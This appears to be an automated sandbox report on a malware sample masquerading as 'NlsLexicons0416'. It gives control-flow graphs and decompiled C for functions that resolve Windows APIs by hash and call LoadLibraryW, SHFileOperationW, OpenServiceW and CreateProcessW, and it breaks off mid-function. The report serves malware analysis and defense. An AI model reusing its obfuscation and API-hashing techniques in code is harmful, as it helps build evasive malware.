                                                                                control_flow_graph 186 3e7120 187 3e7125-3e712a 186->187 188 3e71b4-3e71b9 187->188 189 3e7130 187->189 190 3e71bb 188->190 191 3e7207-3e720c 188->191 192 3e7136-3e713b 189->192 193 3e7233-3e7248 call 3e34c0 189->193 196 3e71ee-3e7202 call 3e7080 190->196 197 3e71bd-3e71c2 190->197 199 3e720e-3e7222 call 3e7080 191->199 200 3e7227-3e722c 191->200 194 3e713d 192->194 195 3e7190-3e7195 192->195 213 3e724a-3e7260 call 3e3f00 call 3e3e60 193->213 214 3e7265-3e7278 LoadLibraryW 193->214 202 3e713f-3e7144 194->202 203 3e717a-3e718e call 3e7080 194->203 195->200 208 3e719b-3e71af call 3e7080 195->208 196->187 204 3e71c4-3e71c9 197->204 205 3e71d5-3e71e9 call 3e7080 197->205 199->187 200->187 201 3e7232 200->201 210 3e7146-3e714b 202->210 211 3e7164-3e7178 call 3e7080 202->211 203->187 204->200 212 3e71cb-3e71d0 204->212 205->187 208->187 210->200 220 3e7151-3e7162 call 3e7080 210->220 211->187 212->187 213->214 224 3e727a-3e7290 call 3e3f00 call 3e3e60 214->224 225 3e7295-3e72a0 214->225 220->187 224->225 236 3e72bd-3e72c5 225->236 237 3e72a2-3e72b8 call 3e3f00 call 3e3e60 225->237 237->236
                                                                                C-Code - Quality: 85%
                                                                                			E003E7120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E003E34C0(0x3ed830);
							__eflags =  *0x3edd1c;
							if( *0x3edd1c == 0) {
								 *0x3edd1c = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x3ee548; // 0x5e7e38
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x3ee494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x3ee494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x3edf30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x3edf30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E003E7080(_t21, 0x3ed7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E003E7080(_t21, 0x3ed8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E003E7080(_t21, 0x3ed800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E003E7080(_t21, 0x3ed860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E003E7080(_t21, 0x3ed890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E003E7080(_t21, 0x3ed7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E003E7080(_t21, 0x3ed8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x003e7120
                                                                                0x003e7120
                                                                                0x003e7120
                                                                                0x003e7125
                                                                                0x003e7125
                                                                                0x003e7125
                                                                                0x003e7125
                                                                                0x003e712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e7130
                                                                                0x003e723f
                                                                                0x003e7246
                                                                                0x003e7248
                                                                                0x003e7260
                                                                                0x003e7260
                                                                                0x003e7266
                                                                                0x003e7268
                                                                                0x003e726e
                                                                                0x003e7271
                                                                                0x003e7276
                                                                                0x003e7278
                                                                                0x003e728b
                                                                                0x003e7290
                                                                                0x003e7290
                                                                                0x003e7297
                                                                                0x003e7299
                                                                                0x003e729e
                                                                                0x003e72a0
                                                                                0x003e72b3
                                                                                0x003e72b8
                                                                                0x003e72b8
                                                                                0x003e72c5
                                                                                0x003e7136
                                                                                0x003e7136
                                                                                0x003e713b
                                                                                0x003e7190
                                                                                0x003e7195
                                                                                0x00000000
                                                                                0x003e719b
                                                                                0x003e71a5
                                                                                0x003e71aa
                                                                                0x00000000
                                                                                0x003e71aa
                                                                                0x003e713d
                                                                                0x003e713d
                                                                                0x003e7184
                                                                                0x003e7189
                                                                                0x00000000
                                                                                0x003e713f
                                                                                0x003e7144
                                                                                0x003e716e
                                                                                0x003e7173
                                                                                0x00000000
                                                                                0x003e7146
                                                                                0x003e7146
                                                                                0x003e714b
                                                                                0x00000000
                                                                                0x003e7151
                                                                                0x003e7158
                                                                                0x003e715d
                                                                                0x00000000
                                                                                0x003e715d
                                                                                0x003e714b
                                                                                0x003e7144
                                                                                0x003e713d
                                                                                0x003e713b
                                                                                0x00000000
                                                                                0x003e7130
                                                                                0x003e71b4
                                                                                0x003e71b9
                                                                                0x003e7207
                                                                                0x003e720c
                                                                                0x00000000
                                                                                0x003e720e
                                                                                0x003e7218
                                                                                0x003e721d
                                                                                0x00000000
                                                                                0x003e721d
                                                                                0x003e71bb
                                                                                0x003e71bb
                                                                                0x003e71f8
                                                                                0x003e71fd
                                                                                0x00000000
                                                                                0x003e71bd
                                                                                0x003e71bd
                                                                                0x003e71c2
                                                                                0x003e71df
                                                                                0x003e71e4
                                                                                0x00000000
                                                                                0x003e71c4
                                                                                0x003e71c4
                                                                                0x003e71c9
                                                                                0x00000000
                                                                                0x003e71cb
                                                                                0x003e71cb
                                                                                0x00000000
                                                                                0x003e71cb
                                                                                0x003e71c9
                                                                                0x003e71c2
                                                                                0x003e71bb
                                                                                0x00000000
                                                                                0x003e7227
                                                                                0x003e7227
                                                                                0x003e7227
                                                                                0x003e7232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003E68AC), ref: 003E7266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: 8~^$Dry9$Dry9
                                                                                • API String ID: 1029625771-306170110
                                                                                • Opcode ID: bb9e6617cedbfdbe6928d1b35d0d9a8d61db983b00d5ad91a9aa2ef536d8f8b2
                                                                                • Instruction ID: a5572c6cf956113bafca362649161f575d7887ecc046480ed099a9fd2f4bd7b1
                                                                                • Opcode Fuzzy Hash: bb9e6617cedbfdbe6928d1b35d0d9a8d61db983b00d5ad91a9aa2ef536d8f8b2
                                                                                • Instruction Fuzzy Hash: 3E31B42170C2F443EE276BBB68D537E11AA97A0304F214766F151CF7D5ED26CE026792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E3780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 246 3e3780-3e3793 247 3e3795-3e37ab call 3e3f00 call 3e3e60 246->247 248 3e37b0-3e37c5 246->248 247->248 252 3e37c7-3e37dd call 3e3f00 call 3e3e60 248->252 253 3e37e2-3e37fa 248->253 252->253 260 3e37fc-3e3812 call 3e3f00 call 3e3e60 253->260 261 3e3817-3e3832 253->261 260->261 266 3e384f-3e385e 261->266 267 3e3834-3e384a call 3e3f00 call 3e3e60 261->267 274 3e387b-3e38b4 266->274 275 3e3860-3e3876 call 3e3f00 call 3e3e60 266->275 267->266 280 3e38b6-3e38cc call 3e3f00 call 3e3e60 274->280 281 3e38d1-3e38e2 SHFileOperationW 274->281 275->274 280->281
                                                                                C-Code - Quality: 62%
                                                                                			E003E3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x3eddc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3eddc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x3eddc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3eddc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x3eddc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3eddc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x3ee298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E003E3E60(_t36, E003E3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x3ee298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x3ee298;
				if(_t20 == 0) {
					_t20 = E003E3E60(_t36, E003E3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x3ee298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x3ee30c == 0) {
					 *0x3ee30c = E003E3E60(_t36, E003E3F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x003e3785
                                                                                0x003e3780
                                                                                0x003e378c
                                                                                0x003e378f
                                                                                0x003e3793
                                                                                0x003e37a6
                                                                                0x003e37ab
                                                                                0x003e37ab
                                                                                0x003e37b9
                                                                                0x003e37bb
                                                                                0x003e37c0
                                                                                0x003e37c5
                                                                                0x003e37d8
                                                                                0x003e37dd
                                                                                0x003e37dd
                                                                                0x003e37ee
                                                                                0x003e37f0
                                                                                0x003e37f5
                                                                                0x003e37fa
                                                                                0x003e380d
                                                                                0x003e3812
                                                                                0x003e3812
                                                                                0x003e3826
                                                                                0x003e3828
                                                                                0x003e382d
                                                                                0x003e3832
                                                                                0x003e3845
                                                                                0x003e384a
                                                                                0x003e384a
                                                                                0x003e3855
                                                                                0x003e3857
                                                                                0x003e385e
                                                                                0x003e3871
                                                                                0x003e3876
                                                                                0x003e3876
                                                                                0x003e3884
                                                                                0x003e388a
                                                                                0x003e3892
                                                                                0x003e389d
                                                                                0x003e38a6
                                                                                0x003e38b4
                                                                                0x003e38cc
                                                                                0x003e38cc
                                                                                0x003e38d5
                                                                                0x003e38d9
                                                                                0x003e38e2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: 5c0d4332eba426a45873ba29692ea69c48a9a45b30bd37d7c3f2c4c624f98f58
                                                                                • Instruction ID: e2571259b13c115823b046172ad6e5d5bd7baf0cc5d258226f0d2eed19634773
                                                                                • Opcode Fuzzy Hash: 5c0d4332eba426a45873ba29692ea69c48a9a45b30bd37d7c3f2c4c624f98f58
                                                                                • Instruction Fuzzy Hash: 6A31B0716002E58BD726AB7ADC4976B37EAABC4704F000B2CB515CF2C1EA34DA058B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E8E80, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 288 3e8e80-3e8e98 289 3e8ea0-3e8ea5 288->289 290 3e8f7a-3e8f7f 289->290 291 3e8eab 289->291 292 3e8f85-3e8f8a 290->292 293 3e9011-3e9016 290->293 294 3e8f3f-3e8f46 291->294 295 3e8eb1-3e8eb6 291->295 298 3e8fce-3e8fd5 292->298 299 3e8f8c-3e8f91 292->299 293->289 296 3e8f48-3e8f5e call 3e3f00 call 3e3e60 294->296 297 3e8f63-3e8f75 294->297 300 3e8ebc-3e8ec1 295->300 301 3e901b-3e9022 295->301 296->297 297->289 303 3e8fd7-3e8fed call 3e3f00 call 3e3e60 298->303 304 3e8ff2-3e900c OpenServiceW 298->304 307 3e8fbb-3e8fc0 299->307 308 3e8f93-3e8fa3 299->308 309 3e8efc-3e8f03 300->309 310 3e8ec3-3e8ec8 300->310 305 3e903f 301->305 306 3e9024-3e903a call 3e3f00 call 3e3e60 301->306 303->304 304->289 323 3e9042-3e9049 305->323 306->305 307->289 314 3e8fc6-3e8fcd 307->314 311 3e8fae-3e8fb6 308->311 312 3e8fa5-3e8fac 308->312 317 3e8f05-3e8f1b call 3e3f00 call 3e3e60 309->317 318 3e8f20-3e8f2f 309->318 310->307 313 3e8ece-3e8ed5 310->313 311->289 312->311 312->312 321 3e8ed7-3e8eed call 3e3f00 call 3e3e60 313->321 322 3e8ef2-3e8efa 313->322 317->318 318->323 335 3e8f35-3e8f3a 318->335 321->322 322->289 335->289
                                                                                C-Code - Quality: 66%
                                                                                			E003E8E80() {
				short* _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t4;
				void* _t6;
				intOrPtr* _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t25;
				void* _t42;
				short* _t43;
				intOrPtr _t44;
				short* _t45;
				void* _t46;
				void* _t47;

				_t25 = _v4;
				_t4 = 0x1779a150;
				_t46 = _v4;
				_t43 = _v4;
				_t42 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t4 - 0xebfcc22;
						if(_t47 <= 0) {
							break;
						}
						if(_t4 == 0x1779a150) {
							_t4 = 0x23287775;
							continue;
						} else {
							if(_t4 == 0x1e3d7119) {
								if( *0x3ee270 == 0) {
									 *0x3ee270 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x56e230f9, _t46);
								}
								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
								_t25 = _t6;
								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
								continue;
							} else {
								if(_t4 != 0x23287775) {
									goto L22;
								} else {
									_t44 =  *0x3ee54c; // 0x5ae080
									_t45 = _t44 + 0x260;
									while( *_t45 != 0x5c) {
										_t45 = _t45 + 2;
									}
									_t43 = _t45 + 2;
									_t4 = 0x10ada17;
									continue;
								}
							}
						}
						L32:
					}
					if(_t47 == 0) {
						_t11 =  *0x3ee4c8;
						if(_t11 == 0) {
							_t11 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0xe9d3e51f, _t46);
							 *0x3ee4c8 = _t11;
						}
						 *_t11(_t25);
						_t42 =  !=  ? 1 : _t42;
						_t4 = 0xd10de09;
						goto L1;
					} else {
						if(_t4 == 0xbf6010) {
							_t15 =  *0x3ee18c;
							if(_t15 == 0) {
								_t15 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x268fe5f0, _t46);
								 *0x3ee18c = _t15;
							}
							 *_t15(_t46);
							goto L31;
						} else {
							if(_t4 == 0x10ada17) {
								_t19 =  *0x3ee310;
								if(_t19 == 0) {
									_t19 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x9ba7cd1, _t46);
									 *0x3ee310 = _t19;
								}
								_t46 =  *_t19(0, 0, 0xf003f);
								if(_t46 == 0) {
									L31:
									return _t42;
								} else {
									_t4 = 0x1e3d7119;
									goto L1;
								}
							} else {
								if(_t4 != 0xd10de09) {
									goto L22;
								} else {
									_t22 =  *0x3ee18c;
									if(_t22 == 0) {
										_t22 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x268fe5f0, _t46);
										 *0x3ee18c = _t22;
									}
									 *_t22(_t25);
									_t4 = 0xbf6010;
									goto L1;
								}
							}
						}
					}
					goto L32;
					L22:
				} while (_t4 != 0x2dd4caa9);
				return _t42;
				goto L32;
			}




















                                                                                0x003e8e82
                                                                                0x003e8e86
                                                                                0x003e8e8c
                                                                                0x003e8e91
                                                                                0x003e8e96
                                                                                0x003e8e98
                                                                                0x003e8ea0
                                                                                0x003e8ea0
                                                                                0x003e8ea0
                                                                                0x003e8ea0
                                                                                0x003e8ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e8f7f
                                                                                0x003e9011
                                                                                0x00000000
                                                                                0x003e8f85
                                                                                0x003e8f8a
                                                                                0x003e8fd5
                                                                                0x003e8fed
                                                                                0x003e8fed
                                                                                0x003e8ff9
                                                                                0x003e8ffb
                                                                                0x003e9009
                                                                                0x00000000
                                                                                0x003e8f8c
                                                                                0x003e8f91
                                                                                0x00000000
                                                                                0x003e8f93
                                                                                0x003e8f93
                                                                                0x003e8f99
                                                                                0x003e8fa3
                                                                                0x003e8fa5
                                                                                0x003e8fa8
                                                                                0x003e8fae
                                                                                0x003e8fb1
                                                                                0x00000000
                                                                                0x003e8fb1
                                                                                0x003e8f91
                                                                                0x003e8f8a
                                                                                0x00000000
                                                                                0x003e8f7f
                                                                                0x003e8eab
                                                                                0x003e8f3f
                                                                                0x003e8f46
                                                                                0x003e8f59
                                                                                0x003e8f5e
                                                                                0x003e8f5e
                                                                                0x003e8f64
                                                                                0x003e8f6d
                                                                                0x003e8f70
                                                                                0x00000000
                                                                                0x003e8eb1
                                                                                0x003e8eb6
                                                                                0x003e901b
                                                                                0x003e9022
                                                                                0x003e9035
                                                                                0x003e903a
                                                                                0x003e903a
                                                                                0x003e9040
                                                                                0x00000000
                                                                                0x003e8ebc
                                                                                0x003e8ec1
                                                                                0x003e8efc
                                                                                0x003e8f03
                                                                                0x003e8f16
                                                                                0x003e8f1b
                                                                                0x003e8f1b
                                                                                0x003e8f2b
                                                                                0x003e8f2f
                                                                                0x003e9042
                                                                                0x003e9049
                                                                                0x003e8f35
                                                                                0x003e8f35
                                                                                0x00000000
                                                                                0x003e8f35
                                                                                0x003e8ec3
                                                                                0x003e8ec8
                                                                                0x00000000
                                                                                0x003e8ece
                                                                                0x003e8ece
                                                                                0x003e8ed5
                                                                                0x003e8ee8
                                                                                0x003e8eed
                                                                                0x003e8eed
                                                                                0x003e8ef3
                                                                                0x003e8ef5
                                                                                0x00000000
                                                                                0x003e8ef5
                                                                                0x003e8ec8
                                                                                0x003e8ec1
                                                                                0x003e8eb6
                                                                                0x00000000
                                                                                0x003e8fbb
                                                                                0x003e8fbb
                                                                                0x003e8fcd
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,005AE080,003E8782,?,3251FEFE,?), ref: 003E8FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenService
                                                                                • String ID: uw(#$uw(#
                                                                                • API String ID: 3098006287-1105621689
                                                                                • Opcode ID: 19a09ee68957cdf23ab751ccb57212b7e6e3df349a4df5f5313a38f48bbf4f8a
                                                                                • Instruction ID: 78b6bbc2b881b371af2f345c21dc38916d6cb9b250a0b5c7445f9b289625706d
                                                                                • Opcode Fuzzy Hash: 19a09ee68957cdf23ab751ccb57212b7e6e3df349a4df5f5313a38f48bbf4f8a
                                                                                • Instruction Fuzzy Hash: 7141B321F042E49BDB226BBFACC477A229AA7C4750F510B69F949CF7C1EE60CC415B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 343 3e4b70-3e4b80 344 3e4b9d-3e4bba 343->344 345 3e4b82-3e4b98 call 3e3f00 call 3e3e60 343->345 349 3e4bbc-3e4bd2 call 3e3f00 call 3e3e60 344->349 350 3e4bd7-3e4bf5 CreateProcessW 344->350 345->344 349->350 353 3e4bf7-3e4bfd 350->353 354 3e4c73-3e4c7a 350->354 357 3e4bff-3e4c13 353->357 358 3e4c14-3e4c1b 353->358 360 3e4c1d-3e4c33 call 3e3f00 call 3e3e60 358->360 361 3e4c38-3e4c45 358->361 360->361 366 3e4c47-3e4c5d call 3e3f00 call 3e3e60 361->366 367 3e4c62-3e4c72 361->367 366->367
                                                                                C-Code - Quality: 60%
                                                                                			E003E4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x3eddc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E003E3E60(__ebx, E003E3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x3eddc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x3ee21c == 0) {
					 *0x3ee21c = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x3ede3c;
						if(_t15 == 0) {
							_t15 = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x3ede3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x3ede3c;
						if(_t17 == 0) {
							_t17 = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x3ede3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x003e4b70
                                                                                0x003e4b70
                                                                                0x003e4b70
                                                                                0x003e4b79
                                                                                0x003e4b7c
                                                                                0x003e4b80
                                                                                0x003e4b93
                                                                                0x003e4b98
                                                                                0x003e4b98
                                                                                0x003e4ba6
                                                                                0x003e4bb0
                                                                                0x003e4bba
                                                                                0x003e4bd2
                                                                                0x003e4bd2
                                                                                0x003e4bf1
                                                                                0x003e4bf5
                                                                                0x003e4c7a
                                                                                0x003e4bf7
                                                                                0x003e4bfd
                                                                                0x003e4c14
                                                                                0x003e4c1b
                                                                                0x003e4c2e
                                                                                0x003e4c33
                                                                                0x003e4c33
                                                                                0x003e4c3c
                                                                                0x003e4c3e
                                                                                0x003e4c45
                                                                                0x003e4c58
                                                                                0x003e4c5d
                                                                                0x003e4c5d
                                                                                0x003e4c66
                                                                                0x003e4c72
                                                                                0x003e4bff
                                                                                0x003e4bff
                                                                                0x003e4c05
                                                                                0x003e4c13
                                                                                0x003e4c13
                                                                                0x003e4bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 003E4BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: c9d5998e97066cf648ffc47c7c72f2f9770aae2be44ba8eb43210b7d21c66f83
                                                                                • Instruction ID: ca1ee35ab55143b4282b9bd607de2bd9cfaaff2e96d1eec5feb6406f363d1a85
                                                                                • Opcode Fuzzy Hash: c9d5998e97066cf648ffc47c7c72f2f9770aae2be44ba8eb43210b7d21c66f83
                                                                                • Instruction Fuzzy Hash: B121D6317003A55BD726AB7BCC857BB37AAABD4700F10462CB554CF2D0FA70D9058751
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 457 3e30a0-3e30b6 458 3e30ba-3e30bf 457->458 459 3e30c0-3e30c5 458->459 460 3e30cb 459->460 461 3e3201-3e3206 459->461 462 3e31ed-3e31f1 460->462 463 3e30d1-3e30d6 460->463 464 3e3208-3e320d 461->464 465 3e3245-3e324c 461->465 468 3e32f6-3e3300 462->468 469 3e31f7-3e31fc 462->469 470 3e30dc-3e30e1 463->470 471 3e31da-3e31e8 463->471 472 3e32ab-3e32b3 464->472 473 3e3213-3e3218 464->473 466 3e324e-3e3264 call 3e3f00 call 3e3e60 465->466 467 3e3269-3e3274 465->467 466->467 492 3e3276-3e328c call 3e3f00 call 3e3e60 467->492 493 3e3291-3e329f RtlAllocateHeap 467->493 469->459 477 3e30e7-3e30ec 470->477 478 3e31a0-3e31a8 470->478 471->459 474 3e32b5-3e32cd call 3e3f00 call 3e3e60 472->474 475 3e32d3-3e32f3 472->475 479 3e322d-3e3232 473->479 480 3e321a-3e3228 call 3e3d00 473->480 474->475 475->468 477->479 485 3e30f2-3e319b 477->485 487 3e31aa-3e31c2 call 3e3f00 call 3e3e60 478->487 488 3e31c8-3e31d5 478->488 479->459 481 3e3238-3e3242 479->481 480->458 485->458 487->488 488->458 492->493 493->468 496 3e32a1-3e32a6 493->496 496->458
                                                                                C-Code - Quality: 71%
                                                                                			E003E30A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
